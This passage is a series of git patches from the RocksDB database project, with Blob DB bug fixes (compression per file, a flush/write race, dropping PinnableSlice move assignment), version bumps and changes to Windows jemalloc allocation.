ASSERT_FALSE(s1->IsPinned()); ASSERT_EQ("foo", s2->ToString()); ASSERT_EQ(1, orig_cleanup); ASSERT_EQ(0, moved_cleanup); diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 6edafe1790e..2a18ee4e05f 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1226,13 +1226,15 @@ Status BlobDBImpl::Get(const ReadOptions& read_options, Status s; bool is_blob_index = false; - s = db_impl_->GetImpl(ro, column_family, key, value, nullptr /*value_found*/, - &is_blob_index); + PinnableSlice index_entry; + s = db_impl_->GetImpl(ro, column_family, key, &index_entry, + nullptr /*value_found*/, &is_blob_index); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:1"); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:2"); if (s.ok()) { - if (is_blob_index) { - PinnableSlice index_entry = std::move(*value); + if (!is_blob_index) { + *value = std::move(index_entry); + } else { s = GetBlobValue(key, index_entry, value); } } From 13b2a9b6ff4d9f2d6954eb36755bb0ff35ea2528 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 7 Nov 2017 17:40:44 -0800 Subject: [PATCH 192/205] Blob DB: use compression in file header instead of global options Summary: To fix the issue of failing to decompress existing value after reopen DB with a different compression settings. Closes https://github.com/facebook/rocksdb/pull/3142 Differential Revision: D6267260 Pulled By: yiwu-arbug fbshipit-source-id: c7cf7f3e33b0cd25520abf4771cdf9180cc02a5f --- utilities/blob_db/blob_db_impl.cc | 8 ++++++-- utilities/blob_db/blob_db_test.cc | 26 ++++++++++++++++++++++++++ utilities/blob_db/blob_file.cc | 2 ++ utilities/blob_db/blob_file.h | 9 +++++++++ 4 files changed, 43 insertions(+), 2 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 2a18ee4e05f..319b0f29403 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -330,6 +330,7 @@ Status BlobDBImpl::OpenAllFiles() { continue; } bfptr->SetHasTTL(bfptr->header_.has_ttl); + bfptr->SetCompression(bfptr->header_.compression); bfptr->header_valid_ = true; std::shared_ptr ra_reader = @@ -567,6 +568,7 @@ std::shared_ptr BlobDBImpl::SelectBlobFile() { reinterpret_cast(DefaultColumnFamily())->GetID(); bfile->header_valid_ = true; bfile->SetHasTTL(false); + bfile->SetCompression(bdb_options_.compression); Status s = writer->WriteHeader(bfile->header_); if (!s.ok()) { @@ -627,6 +629,7 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { ; bfile->header_valid_ = true; bfile->SetHasTTL(true); + bfile->SetCompression(bdb_options_.compression); bfile->file_size_ = BlobLogHeader::kSize; // set the first value of the range, since that is @@ -882,6 +885,7 @@ Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key, return Status::NotFound("Blob file not found"); } + assert(bfile->compression() == bdb_options_.compression); std::string compression_output; Slice value_compressed = GetCompressedSlice(value, &compression_output); @@ -1196,12 +1200,12 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, // TODO(yiwu): Should use compression flag in the blob file instead of // current compression option. - if (bdb_options_.compression != kNoCompression) { + if (bfile->compression() != kNoCompression) { BlockContents contents; auto cfh = reinterpret_cast(DefaultColumnFamily()); s = UncompressBlockContentsForCompressionType( blob_value.data(), blob_value.size(), &contents, - kBlockBasedTableVersionFormat, Slice(), bdb_options_.compression, + kBlockBasedTableVersionFormat, Slice(), bfile->compression(), *(cfh->cfd()->ioptions())); *(value->GetSelf()) = contents.data.ToString(); } diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 708cec5c780..9f627061a2e 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -58,6 +58,14 @@ class BlobDBTest : public testing::Test { ASSERT_OK(TryOpen(bdb_options, options)); } + void Reopen(BlobDBOptions bdb_options = BlobDBOptions(), + Options options = Options()) { + assert(blob_db_ != nullptr); + delete blob_db_; + blob_db_ = nullptr; + Open(bdb_options, options); + } + void Destroy() { if (blob_db_) { Options options = blob_db_->GetOptions(); @@ -573,6 +581,24 @@ TEST_F(BlobDBTest, Compression) { } VerifyDB(data); } + +TEST_F(BlobDBTest, DecompressAfterReopen) { + Random rnd(301); + BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; + bdb_options.disable_background_tasks = true; + bdb_options.compression = CompressionType::kSnappyCompression; + Open(bdb_options); + std::map data; + for (size_t i = 0; i < 100; i++) { + PutRandom("put-key" + ToString(i), &rnd, &data); + } + VerifyDB(data); + bdb_options.compression = CompressionType::kNoCompression; + Reopen(bdb_options); + VerifyDB(data); +} + #endif TEST_F(BlobDBTest, MultipleWriters) { diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index bbd88572554..162f364a2f5 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -30,6 +30,7 @@ BlobFile::BlobFile() : parent_(nullptr), file_number_(0), has_ttl_(false), + compression_(kNoCompression), blob_count_(0), gc_epoch_(-1), file_size_(0), @@ -49,6 +50,7 @@ BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn) path_to_dir_(bdir), file_number_(fn), has_ttl_(false), + compression_(kNoCompression), blob_count_(0), gc_epoch_(-1), file_size_(0), diff --git a/utilities/blob_db/blob_file.h b/utilities/blob_db/blob_file.h index 239e8e1c541..ad738170ec1 100644 --- a/utilities/blob_db/blob_file.h +++ b/utilities/blob_db/blob_file.h @@ -41,6 +41,9 @@ class BlobFile { // have TTL. bool has_ttl_; + // Compression type of blobs in the file + CompressionType compression_; + // number of blobs in the file std::atomic blob_count_; @@ -173,6 +176,12 @@ class BlobFile { void SetHasTTL(bool has_ttl) { has_ttl_ = has_ttl; } + CompressionType compression() const { return compression_; } + + void SetCompression(CompressionType compression) { + compression_ = compression; + } + std::shared_ptr GetWriter() const { return log_writer_; } private: From b7367fe8442b1dcf4fc3ba64dc5e19eb3b5d8376 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 7 Nov 2017 22:59:14 -0800 Subject: [PATCH 193/205] Bump version to 5.8.3 --- HISTORY.md | 3 +++ include/rocksdb/version.h | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/HISTORY.md b/HISTORY.md index f8f74ca0373..6792795bafb 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,4 +1,7 @@ # Rocksdb Change Log +## 5.8.3 (11/08/2017) +No major changes. + ## 5.8.2 (11/03/2017) No major changes. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index e791dcca6e7..ab6ca7a19e2 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 2 +#define ROCKSDB_PATCH 3 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From 725bb9d665a98b2e517924aecab944eaedfb5c92 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Wed, 8 Nov 2017 13:08:15 -0800 Subject: [PATCH 194/205] Blob DB: Fix release build Summary: `compression` shadow the method name in `BlobFile`. Rename it. Closes https://github.com/facebook/rocksdb/pull/3148 Differential Revision: D6274498 Pulled By: yiwu-arbug fbshipit-source-id: 7d293596530998b23b6b8a8940f983f9b6343a98 --- utilities/blob_db/blob_file.h | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/utilities/blob_db/blob_file.h b/utilities/blob_db/blob_file.h index ad738170ec1..4085cfef0bf 100644 --- a/utilities/blob_db/blob_file.h +++ b/utilities/blob_db/blob_file.h @@ -178,8 +178,8 @@ class BlobFile { CompressionType compression() const { return compression_; } - void SetCompression(CompressionType compression) { - compression_ = compression; + void SetCompression(CompressionType c) { + compression_ = c; } std::shared_ptr GetWriter() const { return log_writer_; } From 5d928c795af796140a0937515c14d0e0a1e77f30 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Wed, 8 Nov 2017 19:33:12 -0800 Subject: [PATCH 195/205] Blob DB: Fix race condition between flush and write Summary: A race condition will happen when: * a user thread writes a value, but it hits the write stop condition because there are too many un-flushed memtables, while holding blob_db_impl.write_mutex_. * Flush is triggered and call flush begin listener and try to acquire blob_db_impl.write_mutex_. Fixing it. Closes https://github.com/facebook/rocksdb/pull/3149 Differential Revision: D6279805 Pulled By: yiwu-arbug fbshipit-source-id: 0e3c58afb78795ebe3360a2c69e05651e3908c40 --- utilities/blob_db/blob_db_impl.cc | 31 +++++++++++++++++++++++-------- 1 file changed, 23 insertions(+), 8 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 319b0f29403..1b13513922a 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -745,13 +745,22 @@ class BlobDBImpl::BlobInserter : public WriteBatch::Handler { }; Status BlobDBImpl::Write(const WriteOptions& options, WriteBatch* updates) { - MutexLock l(&write_mutex_); uint32_t default_cf_id = reinterpret_cast(DefaultColumnFamily())->GetID(); + // TODO(yiwu): In case there are multiple writers the latest sequence would + // not be the actually sequence we are writting. Need to get the sequence + // from write batch after DB write instead. SequenceNumber current_seq = GetLatestSequenceNumber() + 1; + Status s; BlobInserter blob_inserter(options, this, default_cf_id, current_seq); - Status s = updates->Iterate(&blob_inserter); + { + // Release write_mutex_ before DB write to avoid race condition with + // flush begin listener, which also require write_mutex_ to sync + // blob files. + MutexLock l(&write_mutex_); + s = updates->Iterate(&blob_inserter); + } if (!s.ok()) { return s; } @@ -759,7 +768,6 @@ Status BlobDBImpl::Write(const WriteOptions& options, WriteBatch* updates) { if (!s.ok()) { return s; } - assert(blob_inserter.sequence() == GetLatestSequenceNumber() + 1); // add deleted key to list of keys that have been deleted for book-keeping class DeleteBookkeeper : public WriteBatch::Handler { @@ -849,10 +857,19 @@ Status BlobDBImpl::PutWithTTL(const WriteOptions& options, Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t expiration) { TEST_SYNC_POINT("BlobDBImpl::PutUntil:Start"); - MutexLock l(&write_mutex_); - SequenceNumber sequence = GetLatestSequenceNumber() + 1; + Status s; WriteBatch batch; - Status s = PutBlobValue(options, key, value, expiration, sequence, &batch); + { + // Release write_mutex_ before DB write to avoid race condition with + // flush begin listener, which also require write_mutex_ to sync + // blob files. + MutexLock l(&write_mutex_); + // TODO(yiwu): In case there are multiple writers the latest sequence would + // not be the actually sequence we are writting. Need to get the sequence + // from write batch after DB write instead. + SequenceNumber sequence = GetLatestSequenceNumber() + 1; + s = PutBlobValue(options, key, value, expiration, sequence, &batch); + } if (s.ok()) { s = db_->Write(options, &batch); } @@ -1198,8 +1215,6 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, return Status::Corruption("Corruption. Blob CRC mismatch"); } - // TODO(yiwu): Should use compression flag in the blob file instead of - // current compression option. if (bfile->compression() != kNoCompression) { BlockContents contents; auto cfh = reinterpret_cast(DefaultColumnFamily()); From 4907d2463b632e942e977cca805b6485eae7896d Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Wed, 8 Nov 2017 21:28:42 -0800 Subject: [PATCH 196/205] Bump version to 5.8.4 --- HISTORY.md | 6 ------ include/rocksdb/version.h | 2 +- 2 files changed, 1 insertion(+), 7 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 6792795bafb..e62622e081c 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,10 +1,4 @@ # Rocksdb Change Log -## 5.8.3 (11/08/2017) -No major changes. - -## 5.8.2 (11/03/2017) -No major changes. - ## 5.8.1 (10/23/2017) ### New Features * Add a new db property "rocksdb.estimate-oldest-key-time" to return oldest data timestamp. The property is available only for FIFO compaction with compaction_options_fifo.allow_compaction = false. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index ab6ca7a19e2..61ca0a1e3fe 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 3 +#define ROCKSDB_PATCH 4 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From e8c9350f269a3940a58d1f33ffc29d97538ca8ee Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Mon, 13 Nov 2017 18:03:57 -0800 Subject: [PATCH 197/205] Blob DB: not using PinnableSlice move assignment Summary: The current implementation of PinnableSlice move assignment have an issue #3163. We are moving away from it instead of try to get the move assignment right, since it is too tricky. Closes https://github.com/facebook/rocksdb/pull/3164 Differential Revision: D6319201 Pulled By: yiwu-arbug fbshipit-source-id: 8f3279021f3710da4a4caa14fd238ed2df902c48 --- CMakeLists.txt | 1 - Makefile | 4 -- TARGETS | 1 - include/rocksdb/slice.h | 25 ----------- src.mk | 1 - util/slice_test.cc | 71 ------------------------------- utilities/blob_db/blob_db_impl.cc | 13 +++--- utilities/blob_db/blob_db_test.cc | 12 ++++++ 8 files changed, 17 insertions(+), 111 deletions(-) delete mode 100644 util/slice_test.cc diff --git a/CMakeLists.txt b/CMakeLists.txt index 18effaa0667..2d99cdf9445 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -802,7 +802,6 @@ if(WITH_TESTS) util/hash_test.cc util/heap_test.cc util/rate_limiter_test.cc - util/slice_test.cc util/slice_transform_test.cc util/timer_queue_test.cc util/thread_list_test.cc diff --git a/Makefile b/Makefile index c5ba1012444..5a89f6bf79d 100644 --- a/Makefile +++ b/Makefile @@ -477,7 +477,6 @@ TESTS = \ object_registry_test \ repair_test \ env_timed_test \ - slice_test \ PARALLEL_TEST = \ backupable_db_test \ @@ -1436,9 +1435,6 @@ range_del_aggregator_test: db/range_del_aggregator_test.o db/db_test_util.o $(LI blob_db_test: utilities/blob_db/blob_db_test.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) -slice_test: util/slice_test.o $(LIBOBJECTS) $(TESTHARNESS) - $(AM_LINK) - #------------------------------------------------- # make install related stuff INSTALL_PATH ?= /usr/local diff --git a/TARGETS b/TARGETS index c9631b25ae1..ac85eab93c7 100644 --- a/TARGETS +++ b/TARGETS @@ -463,7 +463,6 @@ ROCKS_TESTS = [['arena_test', 'util/arena_test.cc', 'serial'], ['repair_test', 'db/repair_test.cc', 'serial'], ['sim_cache_test', 'utilities/simulator_cache/sim_cache_test.cc', 'serial'], ['skiplist_test', 'memtable/skiplist_test.cc', 'serial'], - ['slice_test', 'util/slice_test.cc', 'serial'], ['slice_transform_test', 'util/slice_transform_test.cc', 'serial'], ['spatial_db_test', 'utilities/spatialdb/spatial_db_test.cc', 'serial'], ['sst_dump_test', 'tools/sst_dump_test.cc', 'serial'], diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index 38e7efb6565..4f24c8a2217 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -133,31 +133,6 @@ class PinnableSlice : public Slice, public Cleanable { PinnableSlice(PinnableSlice&) = delete; PinnableSlice& operator=(PinnableSlice&) = delete; - PinnableSlice(PinnableSlice&& other) { *this = std::move(other); } - - PinnableSlice& operator=(PinnableSlice&& other) { - if (this != &other) { - // cleanup itself. - Reset(); - - Slice::operator=(other); - Cleanable::operator=(std::move(other)); - pinned_ = other.pinned_; - if (!pinned_ && other.buf_ == &other.self_space_) { - self_space_ = std::move(other.self_space_); - buf_ = &self_space_; - data_ = buf_->data(); - } else { - buf_ = other.buf_; - } - // Re-initialize the other PinnablaeSlice. - other.self_space_.clear(); - other.buf_ = &other.self_space_; - other.pinned_ = false; - } - return *this; - } - inline void PinSlice(const Slice& s, CleanupFunction f, void* arg1, void* arg2) { assert(!pinned_); diff --git a/src.mk b/src.mk index bb08721df95..5bd5236fa16 100644 --- a/src.mk +++ b/src.mk @@ -326,7 +326,6 @@ MAIN_SOURCES = \ util/filelock_test.cc \ util/log_write_bench.cc \ util/rate_limiter_test.cc \ - util/slice_test.cc \ util/slice_transform_test.cc \ util/timer_queue_test.cc \ util/thread_list_test.cc \ diff --git a/util/slice_test.cc b/util/slice_test.cc deleted file mode 100644 index 33903ec72b9..00000000000 --- a/util/slice_test.cc +++ /dev/null @@ -1,71 +0,0 @@ -// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under both the GPLv2 (found in the -// COPYING file in the root directory) and Apache 2.0 License -// (found in the LICENSE.Apache file in the root directory). - -#include "port/stack_trace.h" -#include "rocksdb/slice.h" -#include "util/testharness.h" - -namespace rocksdb { - -class SliceTest : public testing::Test {}; - -namespace { -void BumpCounter(void* arg1, void* arg2) { - (*reinterpret_cast(arg1))++; -} -} // anonymous namespace - -TEST_F(SliceTest, PinnableSliceMoveConstruct) { - for (int i = 0; i < 3; i++) { - int orig_cleanup = 0; - int moved_cleanup = 0; - PinnableSlice* s1 = nullptr; - std::string external_storage; - switch (i) { - case 0: - s1 = new PinnableSlice(); - *(s1->GetSelf()) = "foo"; - s1->PinSelf(); - s1->RegisterCleanup(BumpCounter, &moved_cleanup, nullptr); - break; - case 1: - s1 = new PinnableSlice(&external_storage); - *(s1->GetSelf()) = "foo"; - s1->PinSelf(); - s1->RegisterCleanup(BumpCounter, &moved_cleanup, nullptr); - break; - case 2: - s1 = new PinnableSlice(); - s1->PinSlice("foo", BumpCounter, &moved_cleanup, nullptr); - break; - } - ASSERT_EQ("foo", s1->ToString()); - PinnableSlice* s2 = new PinnableSlice(); - s2->PinSelf("bar"); - ASSERT_EQ("bar", s2->ToString()); - s2->RegisterCleanup(BumpCounter, &orig_cleanup, nullptr); - *s2 = std::move(*s1); - ASSERT_FALSE(s1->IsPinned()); - ASSERT_EQ("foo", s2->ToString()); - ASSERT_EQ(1, orig_cleanup); - ASSERT_EQ(0, moved_cleanup); - delete s1; - // ASAN will check if it will access storage of s1, which is deleted. - ASSERT_EQ("foo", s2->ToString()); - ASSERT_EQ(1, orig_cleanup); - ASSERT_EQ(0, moved_cleanup); - delete s2; - ASSERT_EQ(1, orig_cleanup); - ASSERT_EQ(1, moved_cleanup); - } -} - -} // namespace rocksdb - -int main(int argc, char** argv) { - rocksdb::port::InstallStackTraceHandler(); - ::testing::InitGoogleTest(&argc, argv); - return RUN_ALL_TESTS(); -} diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 1b13513922a..23f173fd9a9 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1245,17 +1245,14 @@ Status BlobDBImpl::Get(const ReadOptions& read_options, Status s; bool is_blob_index = false; - PinnableSlice index_entry; - s = db_impl_->GetImpl(ro, column_family, key, &index_entry, + s = db_impl_->GetImpl(ro, column_family, key, value, nullptr /*value_found*/, &is_blob_index); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:1"); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:2"); - if (s.ok()) { - if (!is_blob_index) { - *value = std::move(index_entry); - } else { - s = GetBlobValue(key, index_entry, value); - } + if (s.ok() && is_blob_index) { + std::string index_entry = value->ToString(); + value->Reset(); + s = GetBlobValue(key, index_entry, value); } if (snapshot_created) { db_->ReleaseSnapshot(ro.snapshot); diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 9f627061a2e..03396eed389 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -150,6 +150,18 @@ class BlobDBTest : public testing::Test { } void VerifyDB(DB *db, const std::map &data) { + // Verify normal Get + auto* cfh = db->DefaultColumnFamily(); + for (auto &p : data) { + PinnableSlice value_slice; + ASSERT_OK(db->Get(ReadOptions(), cfh, p.first, &value_slice)); + ASSERT_EQ(p.second, value_slice.ToString()); + std::string value; + ASSERT_OK(db->Get(ReadOptions(), cfh, p.first, &value)); + ASSERT_EQ(p.second, value); + } + + // Verify iterators Iterator *iter = db->NewIterator(ReadOptions()); iter->SeekToFirst(); for (auto &p : data) { From cf2b982375a8b4da158697724a3b72781dfaf3e5 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 14 Nov 2017 10:38:22 -0800 Subject: [PATCH 198/205] Bump version to 5.8.5 --- include/rocksdb/version.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index 61ca0a1e3fe..dbc01beebed 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 4 +#define ROCKSDB_PATCH 5 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From aa00523e0e36cead871fcf63282493c28ddce7ab Mon Sep 17 00:00:00 2001 From: Dmitri Smirnov Date: Thu, 31 Aug 2017 16:42:05 -0700 Subject: [PATCH 199/205] Add -DPORTABLE=1 to MSVC CI build Summary: Add -DPORTABLE=1 port::cacheline_aligned_alloc() has arguments swapped which prevents every single test from running. Closes https://github.com/facebook/rocksdb/pull/2815 Differential Revision: D5751661 Pulled By: siying fbshipit-source-id: e0857d6e138ec46035b3c23d7c3c751901a0a4a0 --- appveyor.yml | 2 +- cache/lru_cache.cc | 7 ------- port/win/port_win.h | 2 +- 3 files changed, 2 insertions(+), 9 deletions(-) diff --git a/appveyor.yml b/appveyor.yml index f582bb1950a..be9b66b45c9 100644 --- a/appveyor.yml +++ b/appveyor.yml @@ -3,7 +3,7 @@ image: Visual Studio 2015 before_build: - md %APPVEYOR_BUILD_FOLDER%\build - cd %APPVEYOR_BUILD_FOLDER%\build -- cmake -G "Visual Studio 14 2015 Win64" -DOPTDBG=1 -DXPRESS=1 .. +- cmake -G "Visual Studio 14 2015 Win64" -DOPTDBG=1 -DXPRESS=1 -DPORTABLE=1 .. - cd .. build: project: build\rocksdb.sln diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc index 268378b9d2b..d29e7093427 100644 --- a/cache/lru_cache.cc +++ b/cache/lru_cache.cc @@ -465,14 +465,7 @@ LRUCache::LRUCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit, double high_pri_pool_ratio) : ShardedCache(capacity, num_shard_bits, strict_capacity_limit) { num_shards_ = 1 << num_shard_bits; -#if defined(_MSC_VER) -#pragma warning(push) -#pragma warning(disable: 4316) // We've validated the alignment with the new operators -#endif shards_ = new LRUCacheShard[num_shards_]; -#if defined(_MSC_VER) -#pragma warning(pop) -#endif SetCapacity(capacity); SetStrictCapacityLimit(strict_capacity_limit); for (int i = 0; i < num_shards_; i++) { diff --git a/port/win/port_win.h b/port/win/port_win.h index 1ec09068335..408bc63db59 100644 --- a/port/win/port_win.h +++ b/port/win/port_win.h @@ -242,7 +242,7 @@ extern void InitOnce(OnceType* once, void (*initializer)()); inline void *cacheline_aligned_alloc(size_t size) { - return _aligned_malloc(CACHE_LINE_SIZE, size); + return _aligned_malloc(size, CACHE_LINE_SIZE); } inline void cacheline_aligned_free(void *memblock) { From 36074ba5debc82e95a035e136c4218c1f566f03d Mon Sep 17 00:00:00 2001 From: Dmitri Smirnov Date: Fri, 27 Oct 2017 13:14:07 -0700 Subject: [PATCH 200/205] Enable cacheline_aligned_alloc() to allocate from jemalloc if enabled. Summary: Reuse WITH_JEMALLOC option in preparation for module search unification. Move jemalloc overrides into a separate .cc Remote obsolete JEMALLOC_NOINIT option. Closes https://github.com/facebook/rocksdb/pull/3078 Differential Revision: D6174826 Pulled By: yiwu-arbug fbshipit-source-id: 9970a0289b4490272d15853920d9d7531af91140 --- CMakeLists.txt | 8 ++++- port/win/port_win.cc | 77 ---------------------------------------- port/win/port_win.h | 18 ++++++++++ port/win/win_jemalloc.cc | 47 ++++++++++++++++++++++++ port/win/xpress_win.cc | 59 +++++------------------------- thirdparty.inc | 27 +++++--------- 6 files changed, 89 insertions(+), 147 deletions(-) create mode 100644 port/win/win_jemalloc.cc diff --git a/CMakeLists.txt b/CMakeLists.txt index 2d99cdf9445..45bb105a2ee 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -41,10 +41,10 @@ endif() list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/modules/") +option(WITH_JEMALLOC "build with JeMalloc" OFF) if(MSVC) include(${CMAKE_CURRENT_SOURCE_DIR}/thirdparty.inc) else() - option(WITH_JEMALLOC "build with JeMalloc" OFF) if(CMAKE_SYSTEM_NAME MATCHES "FreeBSD") # FreeBSD has jemaloc as default malloc # but it does not have all the jemalloc files in include/... @@ -574,6 +574,12 @@ if(WIN32) port/win/win_logger.cc port/win/win_thread.cc port/win/xpress_win.cc) + +if(WITH_JEMALLOC) + list(APPEND SOURCES + port/win/win_jemalloc.cc) +endif() + else() list(APPEND SOURCES port/port_posix.cc diff --git a/port/win/port_win.cc b/port/win/port_win.cc index e5d5a44d6c7..b3fccbd9308 100644 --- a/port/win/port_win.cc +++ b/port/win/port_win.cc @@ -228,80 +228,3 @@ int GetMaxOpenFiles() { return -1; } } // namespace port } // namespace rocksdb - -#ifdef JEMALLOC - -#include "jemalloc/jemalloc.h" - -#ifndef JEMALLOC_NON_INIT - -namespace rocksdb { - -namespace port { - -__declspec(noinline) void WINAPI InitializeJemalloc() { - je_init(); - atexit(je_uninit); -} - -} // port -} // rocksdb - -extern "C" { - -#ifdef _WIN64 - -#pragma comment(linker, "/INCLUDE:p_rocksdb_init_jemalloc") - -typedef void(WINAPI* CRT_Startup_Routine)(void); - -// .CRT section is merged with .rdata on x64 so it must be constant data. -// must be of external linkage -// We put this into XCT since we want to run this earlier than C++ static -// constructors -// which are placed into XCU -#pragma const_seg(".CRT$XCT") -extern const CRT_Startup_Routine p_rocksdb_init_jemalloc; -const CRT_Startup_Routine p_rocksdb_init_jemalloc = - rocksdb::port::InitializeJemalloc; -#pragma const_seg() - -#else // _WIN64 - -// x86 untested - -#pragma comment(linker, "/INCLUDE:_p_rocksdb_init_jemalloc") - -#pragma section(".CRT$XCT", read) -JEMALLOC_SECTION(".CRT$XCT") JEMALLOC_ATTR(used) static const void( - WINAPI* p_rocksdb_init_jemalloc)(void) = rocksdb::port::InitializeJemalloc; - -#endif // _WIN64 - -} // extern "C" - -#endif // JEMALLOC_NON_INIT - -// Global operators to be replaced by a linker - -void* operator new(size_t size) { - void* p = je_malloc(size); - if (!p) { - throw std::bad_alloc(); - } - return p; -} - -void* operator new[](size_t size) { - void* p = je_malloc(size); - if (!p) { - throw std::bad_alloc(); - } - return p; -} - -void operator delete(void* p) { je_free(p); } - -void operator delete[](void* p) { je_free(p); } - -#endif // JEMALLOC diff --git a/port/win/port_win.h b/port/win/port_win.h index 408bc63db59..f3c86690515 100644 --- a/port/win/port_win.h +++ b/port/win/port_win.h @@ -240,13 +240,31 @@ extern void InitOnce(OnceType* once, void (*initializer)()); #define CACHE_LINE_SIZE 64U #endif +#ifdef ROCKSDB_JEMALLOC +#include "jemalloc/jemalloc.h" +// Separate inlines so they can be replaced if needed +inline void* jemalloc_aligned_alloc( size_t size, size_t alignment) { + return je_aligned_alloc(alignment, size); +} +inline void jemalloc_aligned_free(void* p) { + je_free(p); +} +#endif inline void *cacheline_aligned_alloc(size_t size) { +#ifdef ROCKSDB_JEMALLOC + return jemalloc_aligned_alloc(size, CACHE_LINE_SIZE); +#else return _aligned_malloc(size, CACHE_LINE_SIZE); +#endif } inline void cacheline_aligned_free(void *memblock) { +#ifdef ROCKSDB_JEMALLOC + jemalloc_aligned_free(memblock); +#else _aligned_free(memblock); +#endif } // https://gcc.gnu.org/bugzilla/show_bug.cgi?id=52991 for MINGW32 diff --git a/port/win/win_jemalloc.cc b/port/win/win_jemalloc.cc new file mode 100644 index 00000000000..fc46e189c4f --- /dev/null +++ b/port/win/win_jemalloc.cc @@ -0,0 +1,47 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. +// +// Copyright (c) 2011 The LevelDB Authors. All rights reserved. +// Use of this source code is governed by a BSD-style license that can be +// found in the LICENSE file. See the AUTHORS file for names of contributors. + +#ifndef ROCKSDB_JEMALLOC +# error This file can only be part of jemalloc aware build +#endif + +#include +#include "jemalloc/jemalloc.h" + +// Global operators to be replaced by a linker when this file is +// a part of the build + +void* operator new(size_t size) { + void* p = je_malloc(size); + if (!p) { + throw std::bad_alloc(); + } + return p; +} + +void* operator new[](size_t size) { + void* p = je_malloc(size); + if (!p) { + throw std::bad_alloc(); + } + return p; +} + +void operator delete(void* p) { + if (p) { + je_free(p); + } +} + +void operator delete[](void* p) { + if (p) { + je_free(p); + } +} + diff --git a/port/win/xpress_win.cc b/port/win/xpress_win.cc index e16ca986491..9ab23c534d9 100644 --- a/port/win/xpress_win.cc +++ b/port/win/xpress_win.cc @@ -17,10 +17,6 @@ #ifdef XPRESS -#ifdef JEMALLOC -#include -#endif - // Put this under ifdef so windows systems w/o this // can still build #include @@ -43,22 +39,6 @@ auto CloseDecompressorFun = [](void* h) { ::CloseDecompressor(reinterpret_cast(h)); } }; - - -#ifdef JEMALLOC -// Make sure compressors use our jemalloc if redirected -PVOID CompressorAlloc(PVOID, SIZE_T size) { - return je_malloc(size); -} - -VOID 